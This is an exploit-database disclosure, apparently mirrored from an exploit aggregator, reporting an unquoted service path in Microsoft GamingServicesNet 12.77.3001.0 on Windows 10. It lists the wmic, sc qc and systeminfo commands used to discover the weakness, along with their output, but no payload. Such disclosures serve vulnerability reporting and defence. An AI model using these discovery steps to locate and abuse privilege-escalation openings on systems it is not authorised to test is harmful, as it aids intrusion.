Share
## https://sploitus.com/exploit?id=1337DAY-ID-38754
# Exploit Title: Microsoft GamingServicesNet 12.77.3001.0 -
'GamingServicesNet' Unquoted Service Path
# Exploit Author: tmrswrr
# Vendor : https://www.microsoft.com/store/productId/9MWPM2CQNLHN
# Version : 12.77.3001.0
# Tested on OS: Windows 10 Enterprise
# Step to discover Unquoted Service Path:
==============
>> wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Gaming Services GamingServicesNet
C:\Program
Files\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
Auto
C:\>sc qc GamingServicesNet
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GamingServicesNet
TYPE : 210 WIN32_PACKAGED_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program
Files\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Gaming Services
DEPENDENCIES : staterepository
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\>systeminfo
Host Name: DESKTOP-JAN8AJH
OS Name: Microsoft Windows 10 Enterprise Evaluation
OS Version: 10.0.19045 N/A Build 19045